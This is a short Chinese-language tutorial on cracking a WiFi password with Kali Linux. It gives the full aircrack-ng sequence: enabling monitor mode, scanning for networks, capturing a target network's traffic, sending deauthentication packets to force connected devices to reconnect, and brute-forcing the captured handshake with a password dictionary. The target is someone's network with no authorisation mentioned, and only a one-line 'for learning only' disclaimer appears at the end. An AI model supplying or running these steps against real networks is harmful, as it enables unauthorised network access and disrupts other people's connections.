使用Kali爆破WIFI密码
使用kali爆破WiFi密码
首先准备一个免驱的kali无线网卡
过程
插上无线网卡,让虚拟机的kali连接上无线网卡
打开终端,使用ifconfig查看网卡信息
可以看到wlan0
就是无线网卡
注意: 以下命令都在
root
模式下执行
为无线网卡开启监听模式
airmon-ng start wlan0
若遇到提示,则运行提示里的命令即可
再次使用ifconfig
命令查看是否被监听
若后面出现mon
则说明已经被监听
扫描附近的WiFi
airodump-ng wlan0mon
BSSID 表示MAC地址
PWR 表示信号 -------排名越靠前的信号越好
CH 表示信号道
ESSID 表示WiFi名称
大概稳定之后可以使用Ctrl + C
结束扫描
抓包
airodump-ng --bssid 02:4B:F3:00:7E:D7 -c 6 --write /home/kali/demo wlan0mon
--bssid 表示目标WiFi的MAC地址
-c 表示目标WiFi所处的信号道
--wirte 表示抓到的包所在的文件地址(/home/kali/ 为文件目录)
若红框中并没有内容则说明还没抓到数据包,这时需要有人连接上WiFi或者让连接的设备下线,让设备再次自动连接WiFi,这时就可以抓取到握手包
我们选择后者的操作,重新打开新的终端,使用命令
sudo aireplay-ng -0 3 -a 02:4B:F3:00:7E:D7 wlan0mon
-0 表示发送攻击的数据包个数
-a 表示目标WiFi的MAC地址
这个时候可以发现上一个终端所标的红框处已经有了内容,说明抓包成功
来到保存握手包的目录,可以发现握手包已经放在了此目录下
使用密码字典进行爆破
密码字典可以使用网上找的,也可以使用kali自带的
来到密码字典所在的目录,执行下面命令
aircrack-ng -w FastPwds.txt /home/kali/demo-01.cap
-w 表示密码字典
/home/kali/demo-01.cap 则是握手包
啪的一下,很快啊,就爆破完了(前提密码很简单),红框中的内容就是密码
注意:本方法只是用来学习和交流的